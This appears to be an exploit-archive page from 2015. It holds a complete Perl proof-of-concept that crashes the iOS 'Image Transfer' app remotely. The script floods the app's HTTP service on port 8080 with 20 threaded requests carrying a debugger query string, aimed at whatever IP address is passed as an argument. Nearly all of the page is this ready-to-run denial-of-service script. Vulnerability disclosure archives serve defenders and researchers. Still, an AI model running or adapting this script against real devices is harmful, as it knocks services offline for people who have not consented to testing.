Image Transfer IOS - Remote Crash Proof Of Concept

2015-07-21 09:05:52

#!/usr/bin/perl -w
# Title : Image Transfer IOS - Remote Crash Proof Of Concept
# Affected Versions: All Version
# Tested on IOS 8.4 (12h143) / 2.0
# Itunes link : https://itunes.apple.com/us/app/image-transfer-photo-video/id588696602?mt=8
#
# EDB note: Might require to be run multiple times to cause DoS
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#


system(($^O eq 'MSWin32') ? 'cls' : 'clear');

use threads;
use LWP::UserAgent;


print "    Mohammad Reza Espargham\n   www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";


$port=8080; #port
$host=$ARGV[0]; #host


sub check_app { #thread sub
my $ua = LWP::UserAgent->new();
$ua = new LWP::UserAgent(agent => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5");
$ua -> timeout(10);
print "*";
$ua->get("http://$host:$port/?__debugger__=yes&cmd=resource&f=debugger.js");
return 0;
}

my @threads;
for (my $i = 0; $i < 20; $i++) {
my $thread = threads->create(\&check_app);
push(@threads, $thread);
}
foreach (@threads) { #join
$_->join();
}

Fixes

No fixes

In order to submit a new fix you need to be registered.